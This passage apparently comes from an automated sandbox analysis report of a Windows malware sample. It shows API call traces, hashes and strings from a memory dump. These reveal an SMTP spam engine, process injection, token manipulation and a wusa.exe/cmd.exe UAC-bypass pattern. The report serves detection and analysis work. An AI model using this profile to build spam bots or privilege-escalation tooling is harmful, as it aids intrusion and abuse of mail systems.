                                                                                        • gethostname.WS2_32(?,00000080), ref: 030F30D8
                                                                                        • gethostbyname.WS2_32(?), ref: 030F30E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: gethostbynamegethostname
                                                                                        • String ID:
                                                                                        • API String ID: 3961807697-0
                                                                                        • Opcode ID: 005a54dd6950c8af24031a74712457c71a078b2d4396e711555e9b16c9baa9da
                                                                                        • Instruction ID: 8fbe4c51c09f1558677c961a247b1194e96b9aa2dc2f1126165df49a5edc22f0
                                                                                        • Opcode Fuzzy Hash: 005a54dd6950c8af24031a74712457c71a078b2d4396e711555e9b16c9baa9da
                                                                                        • Instruction Fuzzy Hash: 0DE065759011199FCB10EBA8EC85FCA77ECFB0C208F080061FA45E7254EA74E50487A0
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,7FFF0001,80000001,?,030FDB55,7FFF0001), ref: 030FEC13
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEC1A
                                                                                          • Part of subcall function 030FEBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
                                                                                          • Part of subcall function 030FEBCC: RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1357844191-0
                                                                                        • Opcode ID: 886d0811cd8ddae9bc47dd0a232933ea24b4b402a6bee50c71254627d972e01d
                                                                                        • Instruction ID: fcae424812e8d7d163ccaa6d89d8912b3d12666f48cf18abe9ccb76afe43608b
                                                                                        • Opcode Fuzzy Hash: 886d0811cd8ddae9bc47dd0a232933ea24b4b402a6bee50c71254627d972e01d
                                                                                        • Instruction Fuzzy Hash: 80E01A36106618BEDF456B94E808BEA3B59EB48666F108025FB0D89870CB728990DA95
                                                                                        APIs
                                                                                          • Part of subcall function 030FEBA0: GetProcessHeap.KERNEL32(00000000,00000000,030FEC0A,00000000,80000001,?,030FDB55,7FFF0001), ref: 030FEBAD
                                                                                          • Part of subcall function 030FEBA0: HeapSize.KERNEL32(00000000,?,030FDB55,7FFF0001), ref: 030FEBB4
                                                                                        • GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$FreeSize
                                                                                        • String ID:
                                                                                        • API String ID: 1305341483-0
                                                                                        • Opcode ID: a7a8d0ca6c38f6f66894c6d43e4ed2e0fedd725076049f47f4e617e8c79178f0
                                                                                        • Instruction ID: 695e79fd098db5618a6040345063b7c799eac1212aa82ac29c7b8c85a2ec008b
                                                                                        • Opcode Fuzzy Hash: a7a8d0ca6c38f6f66894c6d43e4ed2e0fedd725076049f47f4e617e8c79178f0
                                                                                        • Instruction Fuzzy Hash: 1BC012324077306FC5557650FC0CFDB6B589F4DA11F090409F5056A05487B4988186F1
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
                                                                                          • Part of subcall function 030FEB74: GetProcessHeap.KERNEL32(00000000,00000000,030FEC28,00000000,?,030FDB55,7FFF0001), ref: 030FEB81
                                                                                          • Part of subcall function 030FEB74: HeapSize.KERNEL32(00000000,?,030FDB55,7FFF0001), ref: 030FEB88
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateSize
                                                                                        • String ID:
• API String ID: 2559512979-0
• Opcode ID: 7abc6f8dba5136e5d9ecaa075043f823778e677c4d0c7e4b2c80ffa0de72cfaf
• Instruction ID: 8d610beb8756bdcb74f652398f080a2920965763412d22bb5eadc40451a8fa7d
• Opcode Fuzzy Hash: 7abc6f8dba5136e5d9ecaa075043f823778e677c4d0c7e4b2c80ffa0de72cfaf
• Instruction Fuzzy Hash: F3C08C3620A7206BC60537A4FC0CFDB3E98EF8C2A2F040004F609C6164CB708880C7B2
APIs
• recv.WS2_32(000000C8,?,00000000,030FCA44), ref: 030FF476
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: c92027f51e5a58f7fc07e732ddc9feb171807e3aec2556f2507bb557e020bd93
• Instruction ID: ff317c50b58ab9496d175d120dcbb7f08c84709b7cc0371d1701e18c3a42ee56
• Opcode Fuzzy Hash: c92027f51e5a58f7fc07e732ddc9feb171807e3aec2556f2507bb557e020bd93
• Instruction Fuzzy Hash: B2F0FE7320555AAF9B11EE59DC84CAB7BAEFB8D2507080521FA14D6510D631E8618660
APIs
• closesocket.WS2_32(00000000), ref: 030F1992
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
• Opcode ID: bb4967a2351f3f88838fc0f50d5bf52387240909cb47c473d2ba53db72bdd513
• Instruction ID: 68df490a39675f8a65ae96e7e0b02398ab5300ffd873a1a60279bb27d77bfce8
• Opcode Fuzzy Hash: bb4967a2351f3f88838fc0f50d5bf52387240909cb47c473d2ba53db72bdd513
• Instruction Fuzzy Hash: 0ED0223610E6326E42043319BC004BFABDCCF4C062701801AFD48C4400CA30C88183E5
APIs
• lstrcmpiA.KERNEL32(80000011,00000000), ref: 030FDDB5
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: 16434294aa7edbcba57dec8067e01f4bb63905db53bee600dc23dc6968433170
• Instruction ID: d197123415c781c6ac08b36fb354fb912c83a1eef3fb8ca616090aeb0158f368
• Opcode Fuzzy Hash: 16434294aa7edbcba57dec8067e01f4bb63905db53bee600dc23dc6968433170
• Instruction Fuzzy Hash: B2F08C31202312CFCB60CE249984656F3E8EF89329F184D2EE355D2988D770D885CB21
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,030F9816,EntryPoint), ref: 030F638F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,030F9816,EntryPoint), ref: 030F63A9
• VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 030F63CA
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 030F63EB
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: AllocVirtual$HandleMemoryModuleProcessWrite
• String ID:
• API String ID: 1965334864-0
• Opcode ID: 1858364a1cdefbaacc541077bd37e76054551c9f35b0601a5c3a379c44e8c607
• Instruction ID: d775c0a2c415f65370a25941bec87531f366337fd45e3a56d50c7924a43e25f0
• Opcode Fuzzy Hash: 1858364a1cdefbaacc541077bd37e76054551c9f35b0601a5c3a379c44e8c607
• Instruction Fuzzy Hash: 7011A771A0121DBFDB559F65DC49F9B3BACEB497A8F004024FA05D7640D671DC008AB4
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,00000000,030F1839,030F9646), ref: 030F1012
• GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 030F10C2
• GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 030F10E1
• GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 030F1101
• GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 030F1121
• GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 030F1140
• GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 030F1160
• GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 030F1180
• GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 030F119F
• GetProcAddress.KERNEL32(00000000,NtClose), ref: 030F11BF
• GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 030F11DF
• GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 030F11FE
• GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 030F121A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
• API String ID: 2238633743-3228201535
• Opcode ID: dc3d589950ab8447ce836bdf55307fd6c9ed3bbbf69a170a8fc83d5146e91513
• Instruction ID: 0b4df3ed678178f30d8ad23ffd96527127d3adcbd51d16830fd810c7d1f024dd
• Opcode Fuzzy Hash: dc3d589950ab8447ce836bdf55307fd6c9ed3bbbf69a170a8fc83d5146e91513
• Instruction Fuzzy Hash: 57517D79647A01EFC79CEAA9E84075676E8678C329F18072A9570D26D9DBF0C0C1CF71
APIs
• GetLocalTime.KERNEL32(?), ref: 030FB2B3
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 030FB2C2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 030FB2D0
• SystemTimeToFileTime.KERNEL32(?,?), ref: 030FB2E1
• FileTimeToSystemTime.KERNEL32(?,?), ref: 030FB31A
• GetTimeZoneInformation.KERNEL32(?), ref: 030FB329
• wsprintfA.USER32 ref: 030FB3B7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: Time$File$System$Local$InformationZonewsprintf
• String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
• API String ID: 766114626-2976066047
• Opcode ID: d30459ebd0777d47419d8f9ba313e1d3146595dacb1914a33838ed229a216d40
• Instruction ID: 9b0c78a3e1dacaf6e126911edab25dbe6a473a72e7994278c24eff6c14d1f33a
• Opcode Fuzzy Hash: d30459ebd0777d47419d8f9ba313e1d3146595dacb1914a33838ed229a216d40
• Instruction Fuzzy Hash: 75514BB1D0121CAFCF54DFD4DA88AEEBBB9BF4C304F144099E605B6190D7B44A89CBA4
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
• String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
• API String ID: 2400214276-165278494
• Opcode ID: d75d75994f471157f4289381a36affafe720b229021f93e544eb9e44672a9470
• Instruction ID: 8be2d244cd5b6c671645b848a181911db33d8768643c75336540695bb7755d4b
• Opcode Fuzzy Hash: d75d75994f471157f4289381a36affafe720b229021f93e544eb9e44672a9470
• Instruction Fuzzy Hash: 80614C72A40208AFDB60EFA4DC45FEA77E9FB4C305F144069FA69D6162DBB199408F60
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: wsprintf$send$lstrlenrecv
• String ID: .$ $AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
• API String ID: 3650048968-4264063882
• Opcode ID: 31006b7dc6d9aa4c873f1383b21e853a72513fd8bd3c8fc0763be806c430da28
• Instruction ID: b2b12a56fc751f88aa90780dca935e0fa23948e8fa70a865fedf761909911d75
• Opcode Fuzzy Hash: 31006b7dc6d9aa4c873f1383b21e853a72513fd8bd3c8fc0763be806c430da28
• Instruction Fuzzy Hash: 35A18D31B06345AFDF60DA54DC84FFE77A9EB08308F180466FB0D66892DBB189898F51
APIs
• ShellExecuteExW.SHELL32(?), ref: 030F139A
• lstrlenW.KERNEL32(-00000003), ref: 030F1571
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: ExecuteShelllstrlen
• String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
• API String ID: 1628651668-3716895483
• Opcode ID: 8db3f8a0e239da114eea6659e6f0d6aa57ebab34fdb1cc7356d3373d728be58f
• Instruction ID: 278e280c38c1db79950c4114ff017cbfb7bf0735511d06d54bc49b93605de7b9
• Opcode Fuzzy Hash: 8db3f8a0e239da114eea6659e6f0d6aa57ebab34fdb1cc7356d3373d728be58f
• Instruction Fuzzy Hash: B5F17AB5509341DFD328DF64C888BABB7E9FB88704F04492DF69697290D7B4D884CB62
APIs
• GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 030F2A83
• HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 030F2A86
• socket.WS2_32(00000002,00000002,00000011), ref: 030F2AA0
• htons.WS2_32(00000000), ref: 030F2ADB
• select.WS2_32 ref: 030F2B28
• recv.WS2_32(?,00000000,00001000,00000000), ref: 030F2B4A
• htons.WS2_32(?), ref: 030F2B71
• htons.WS2_32(?), ref: 030F2B8C
• GetProcessHeap.KERNEL32(00000000,00000108), ref: 030F2BFB
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: Heaphtons$Process$Allocrecvselectsocket
• String ID:
• API String ID: 1639031587-0
• Opcode ID: 64c98108d00da0c6e52fbf2f595d5774a6356fb9b1e6c29f615895a09b88dee2
• Instruction ID: 457b33047db6968f5fee205c660ceef8ce70638cd5698593633847ebebbf900c
• Opcode Fuzzy Hash: 64c98108d00da0c6e52fbf2f595d5774a6356fb9b1e6c29f615895a09b88dee2
• Instruction Fuzzy Hash: 7C61BD79906305AFC720EF65D808B6BBBECEB8C745F050D09FA8997540D7B5D8808BE2
APIs
• RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 030F70C2
• RegEnumValueA.ADVAPI32(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 030F719E
• RegCloseKey.ADVAPI32(75920F10,?,75920F10,00000000), ref: 030F71B2
• RegCloseKey.ADVAPI32(75920F10), ref: 030F7208
• RegCloseKey.ADVAPI32(75920F10), ref: 030F7291
• ___ascii_stricmp.LIBCMT ref: 030F72C2
• RegCloseKey.ADVAPI32(75920F10), ref: 030F72D0
• RegCloseKey.ADVAPI32(75920F10), ref: 030F7314
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F738D
• RegCloseKey.ADVAPI32(75920F10), ref: 030F73D8
  • Part of subcall function 030FF1A5: lstrlenA.KERNEL32(000000C8,000000E4,031022F8,000000C8,030F7150,?), ref: 030FF1AD
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
• String ID: $"
• API String ID: 4293430545-3817095088
• Opcode ID: 9a54f407b71e934f32ac90c6223936e489e59f1461b7eaf9630e6cfc75e1b421
• Instruction ID: dca81e5cee46b4ffefa48f6b4ef1eff9e3cae4fbe9fc07c10851af7ec141a3cc
• Opcode Fuzzy Hash: 9a54f407b71e934f32ac90c6223936e489e59f1461b7eaf9630e6cfc75e1b421
• Instruction Fuzzy Hash: 72B1BF72802209BFDB55EFA4DC44BEEB7BCEF48740F140466F600E6490EB759A84CB65
APIs
• GetLocalTime.KERNEL32(?), ref: 030FAD98
• SystemTimeToFileTime.KERNEL32(?,?), ref: 030FADA6
  • Part of subcall function 030FAD08: gethostname.WS2_32(?,00000080), ref: 030FAD1C
  • Part of subcall function 030FAD08: lstrlenA.KERNEL32(?), ref: 030FAD60
  • Part of subcall function 030FAD08: lstrlenA.KERNEL32(?), ref: 030FAD69
  • Part of subcall function 030FAD08: lstrcpyA.KERNEL32(?,LocalHost), ref: 030FAD7F
  • Part of subcall function 030F30B5: gethostname.WS2_32(?,00000080), ref: 030F30D8
  • Part of subcall function 030F30B5: gethostbyname.WS2_32(?), ref: 030F30E2
• wsprintfA.USER32 ref: 030FAEA5
  • Part of subcall function 030FA7A3: inet_ntoa.WS2_32(00000000), ref: 030FA7A9
• wsprintfA.USER32 ref: 030FAE4F
• wsprintfA.USER32 ref: 030FAE5E
  • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 030FEF92
  • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?), ref: 030FEF99
  • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(00000000), ref: 030FEFA0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
• String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
• API String ID: 3631595830-1816598006
• Opcode ID: 49e3d92dc76d879c8b8c4763a3e7bf1289c68a4a8ab1f4f811c27530c58e14cb
• Instruction ID: c3d42ba4ad306946163e2cde248eabf4a2e50698ac999f67a8593d3eace1a9cf
• Opcode Fuzzy Hash: 49e3d92dc76d879c8b8c4763a3e7bf1289c68a4a8ab1f4f811c27530c58e14cb
• Instruction Fuzzy Hash: FB412BB690030CAFDB25EFA0DC45FEE3BADBB4C304F14042ABA2996151EA71D954CB60
APIs
• GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E01
• LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E11
• GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 030F2E2E
• GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E4C
• HeapAlloc.KERNEL32(00000000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2E4F
• htons.WS2_32(00000035), ref: 030F2E88
• inet_addr.WS2_32(?), ref: 030F2E93
• gethostbyname.WS2_32(?), ref: 030F2EA6
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2EE3
• HeapFree.KERNEL32(00000000,?,00000000,030F2F0F,?,030F20FF,03102000), ref: 030F2EE6
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
Yara matches
Similarity
• API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
• String ID: GetNetworkParams$iphlpapi.dll
• API String ID: 929413710-2099955842
• Opcode ID: 3f72271cd710b9907a09efd567c6fec9fa9d3b621cc0327f31f523b031c0da8f
• Instruction ID: e296afd0bf2a95cfa5875d32748b346057db1ed7faf07628dbc2c9c82e418ddf
• Opcode Fuzzy Hash: 3f72271cd710b9907a09efd567c6fec9fa9d3b621cc0327f31f523b031c0da8f
• Instruction Fuzzy Hash: FA31D639A01609AFDB50EBB8D844B6FB7FCAF0C369F284515FA14E7680DB70D5818B60
APIs
• GetVersionExA.KERNEL32(?,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F9340
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,030F9DD7,?,00000022,?,?,00000000,00000001), ref: 030F9375
                                                                                        • wsprintfA.USER32 ref: 030F93CE
                                                                                        • wsprintfA.USER32 ref: 030F940C
                                                                                        • wsprintfA.USER32 ref: 030F948D
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 030F94F1
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 030F9526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 030F9571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: runas
                                                                                        • API String ID: 3696105349-4000483414
                                                                                        • Opcode ID: 72d9b93c07576ba8b4716d70f164c1e44c30144d662a90838a7762c620e53dfa
                                                                                        • Instruction ID: 65cb863bf11153161bbb50dc14e1c950c18a07d969feb51aac4246255e24b09b
                                                                                        • Opcode Fuzzy Hash: 72d9b93c07576ba8b4716d70f164c1e44c30144d662a90838a7762c620e53dfa
                                                                                        • Instruction Fuzzy Hash: 41A18DB2941208AFEB25EFA0CC85FEE3BACFB48745F140426FB1596151E7B5D584CBA0
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F2078
                                                                                        • GetTickCount.KERNEL32 ref: 030F20D4
                                                                                        • GetTickCount.KERNEL32 ref: 030F20DB
                                                                                        • GetTickCount.KERNEL32 ref: 030F212B
                                                                                        • GetTickCount.KERNEL32 ref: 030F2132
                                                                                        • GetTickCount.KERNEL32 ref: 030F2142
                                                                                          • Part of subcall function 030FF04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4), ref: 030FF089
                                                                                          • Part of subcall function 030FF04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,030FE342,00000000,7508EA50,80000001,00000000,030FE513,?,00000000,00000000,?,000000E4,000000C8), ref: 030FF093
                                                                                          • Part of subcall function 030FE854: lstrcpyA.KERNEL32(00000001,?,?,030FD8DF,00000001,localcfg,except_info,00100000,03100264), ref: 030FE88B
                                                                                          • Part of subcall function 030FE854: lstrlenA.KERNEL32(00000001,?,030FD8DF,00000001,localcfg,except_info,00100000,03100264), ref: 030FE899
                                                                                          • Part of subcall function 030F1C5F: wsprintfA.USER32 ref: 030F1CE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                        • String ID: localcfg$net_type$rbl_bl$rbl_ip$~k
                                                                                        • API String ID: 3976553417-173824088
                                                                                        • Opcode ID: 0137029bd4a15e733e066b18bb4751f7312fdb4e8eccd9d3bda8664d7fa80d4f
                                                                                        • Instruction ID: e4bb791799703f8a1dc8a5e1164b064dd25041b23ef455a527e262f10a625151
                                                                                        • Opcode Fuzzy Hash: 0137029bd4a15e733e066b18bb4751f7312fdb4e8eccd9d3bda8664d7fa80d4f
                                                                                        • Instruction Fuzzy Hash: BE51163950634A5FE76CFF74ED49B963BDCAB4C318F080C29E7018A995DBF49085CA25
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 030FB467
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 030FEF92
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(?), ref: 030FEF99
                                                                                          • Part of subcall function 030FEF7C: lstrlenA.KERNEL32(00000000), ref: 030FEFA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$wsprintf
                                                                                        • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                        • API String ID: 1220175532-2340906255
                                                                                        • Opcode ID: 7f933d6c7fe5fdfb0028c6b53adb01c05835f594b9dfbcefa3462e3d7919e82c
                                                                                        • Instruction ID: cd40cbc5a061de09dbd576dbbfd99ac9dd865d460db5f5e2c87b669bef105693
                                                                                        • Opcode Fuzzy Hash: 7f933d6c7fe5fdfb0028c6b53adb01c05835f594b9dfbcefa3462e3d7919e82c
                                                                                        • Instruction Fuzzy Hash: 70417BB65022197FDF00EAA4CCC1EFF7B6CEF8D688B140015FA14A6451DB70AA1887B1
                                                                                        APIs
                                                                                          • Part of subcall function 030FA4C7: GetTickCount.KERNEL32 ref: 030FA4D1
                                                                                          • Part of subcall function 030FA4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 030FA4FA
                                                                                        • GetTickCount.KERNEL32 ref: 030FC31F
                                                                                        • GetTickCount.KERNEL32 ref: 030FC32B
                                                                                        • GetTickCount.KERNEL32 ref: 030FC363
                                                                                        • GetTickCount.KERNEL32 ref: 030FC378
                                                                                        • GetTickCount.KERNEL32 ref: 030FC44D
                                                                                        • InterlockedIncrement.KERNEL32(030FC4E4), ref: 030FC4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,030FB535,00000000,?,030FC4E0), ref: 030FC4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,030FC4E0,03103588,030F8810), ref: 030FC4CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        • Opcode ID: a6cd8518a9d53179a2d83b6936451fc892ea3f26d9c97dacc5e0872812b1504a
                                                                                        • Instruction ID: bf82991ab0eacfafb016585ad3a34bcc4699a7c2122daf49c4e3915844c22eff
                                                                                        • Opcode Fuzzy Hash: a6cd8518a9d53179a2d83b6936451fc892ea3f26d9c97dacc5e0872812b1504a
                                                                                        • Instruction Fuzzy Hash: 0F5178B1A02B458FE764DF69C5C552ABBE9FB48240B544D2EE28BC7E90D770F8408B14
                                                                                        APIs
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 030FBE4F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 030FBE5B
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 030FBE67
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 030FBF6A
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 030FBF7F
                                                                                        • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 030FBF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                        • API String ID: 1586166983-1625972887
                                                                                        • Opcode ID: 1f315daeed99df34d4a3a8eefa1e4ccd68eb441fbd8969630f424e4830aea1b5
